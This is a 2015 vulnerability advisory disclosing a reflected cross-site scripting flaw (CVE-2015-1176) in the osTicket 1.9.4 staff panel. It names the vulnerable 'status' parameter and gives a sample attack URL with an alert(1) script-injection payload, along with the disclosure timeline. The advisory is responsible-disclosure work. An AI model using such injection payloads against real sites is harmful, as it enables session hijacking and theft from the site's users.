osTicket 1.9.4 Cross Site Scripting

`CVE-2015-1176-xss-osticket  
  
  
Information  
----------------  
Advisory by Octogence.  
Name: Reflected XSS Vulnerability in osTicket Ticket system  
Affected Software : osTicket  
Affected Versions: 1.9.4 and possibly below  
Vendor Homepage : http://osticket.com/  
Vulnerability Type : Cross-site Scripting  
Severity : High  
CVE ID: CVE-2015-1176  
  
Impact  
----------  
An attacker can craft a URL with malicious JavaScript code which  
executes in the browser.  
  
Technical Details  
-------------------------  
Sample URL:  
http://localhost/osticket/upload/scp/tickets.php?a=search&status=032″><script>alert(1)<%2fscript>&uid=3  
  
Parameter:  
status  
  
Sample Payload:  
“><script>alert(1)</script>  
  
For more information on cross-site scripting vulnerabilities read the  
following article:  
  
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)  
  
Advisory Timeline (mm/dd/yyyy)  
-----------------------------------------------  
12/15/2014 – Reported  
01/02/2015 – Vulnerability Fixed  
01/18/2015 – Advisory Released  
  
  
--   
Regards  
Sudhanshu  
  
Octogence Tech Solutions  
Noida, India  
Mobile | +91-9971658929  
Website| www.octogence.com  
`